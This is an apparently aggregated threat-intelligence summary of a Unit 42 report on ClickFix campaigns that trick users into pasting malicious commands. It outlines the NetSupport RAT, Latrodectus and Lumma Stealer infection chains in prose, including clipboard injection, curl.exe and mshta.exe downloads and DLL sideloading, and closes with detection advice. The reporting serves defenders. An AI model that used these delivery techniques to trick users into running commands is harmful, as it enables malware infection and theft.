ClickFix Pervasive in 2025, Fueling NetSupport, Latrodectus, and Lumma Stealer Infections Across Key Sectors

Category: Malware Campaign | Industries: Automotive, Energy, Financial, Government, Healthcare, Legal, Manufacturing, Mining, Professional Services, Retail, Technology, Telecommunications, Utilities, Wholesale | Source: Unit 42

Tracking the rise of ClickFix campaigns since late 2024, Unit 42 reports observing a steady increase in activity through the first half of 2025. The ClickFix technique, which involves convincing users to manually execute malicious commands, has become a common tool for delivering various malware payloads. Notable malware linked to this tactic includes NetSupport RAT, Latrodectus malware downloader, and Lumma Stealer. These campaigns have impacted multiple critical sectors, with high technology (~180 incidents), financial services (~140), and manufacturing (~130) experiencing the greatest impact. Other affected sectors include retail, government, legal services, energy, and telecommunications. Unit 42 warns, "These lures can be fairly simple for threat actors to prepare, leaving organizations susceptible to credential gathering, mail theft and even ransomware incidents." The steady rise in weekly infections peaked between mid-March and early April 2025, with notable spikes recorded during these weeks.

Reviewing three observed attack paths delivering unique malware payloads, starting with NetSupport RAT. Infections have been tied to the healthcare, legal, telecommunications, retail, and mining sectors. The infection chain began with lure websites imitating services like DocuSign and Okta, suspected to use ClearFake infrastructure. Victims were prompted to use the Run dialog to execute a PowerShell command that called "cmd.exe" to perform reconnaissance and download a malicious ZIP archive into the "%APPDATA%/Local/Temp/" directory. This archive contained "jp2launcher.exe" and a malicious "msvcp140.dll" loader. The DLL then dropped NetSupport RAT ("client32.exe"), completing the infection chain. The use of Russian-language comments and JavaScript clipboard injection techniques within ClearFake infrastructure provided additional context to the campaign's origin.

A second campaign involving Latrodectus malware surfaced between March and April 2025, using the ClickFix method with ClearFake infrastructure to compromise victims. The lure prompted users to paste and run a PowerShell command secretly injected into their clipboard. The paste command was carefully sectioned to avoid detection, with victims only seeing "Cloud Identificator: 2031". The hidden PowerShell window used "curl.exe" to retrieve a JavaScript file, which in turn downloaded and executed an MSI file responsible for dropping Latrodectus as a DLL. The JavaScript used bloated JSON variables for obfuscation, while the MSI deployed Latrodectus via DLL sideloading. The infection concluded with shellcode injection and network beaconing to attacker infrastructure.

The third major campaign analyzed involved Lumma Stealer, which has abused the ClickFix technique since late 2024, targeting industries such as automotive, energy, and technology. Attackers utilized "mshta.exe" to download an encoded PowerShell script that delivered the initial Lumma Stealer payload. The infection chain involved the execution of a stager—"PartyContinued.exe"—which used AutoIt scripts and CAB files to deploy the malware. Specific commands executed by the loader included process enumeration ("tasklist with findstr") to identify security software, directory creation ("cmd /c"), CAB extraction ("extrac32"), and AutoIt script execution (".a3x" files). The AutoIt-compiled executable launched the Lumma Stealer payload, which harvested sensitive data and exfiltrated it to attacker-controlled servers.

Unit 42 advises that traces of ClickFix campaigns can often be identified through Windows artifacts such as the RunMRU registry key located at "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU". This key records commands executed via the Run dialog. Additionally, defenders can look for suspicious PowerShell execution patterns and the presence of clipboard manipulation combined with command execution. The growing prevalence of ClickFix campaigns reinforces the need for continuous monitoring, threat hunting, and increased user awareness to mitigate these social engineering-based attacks.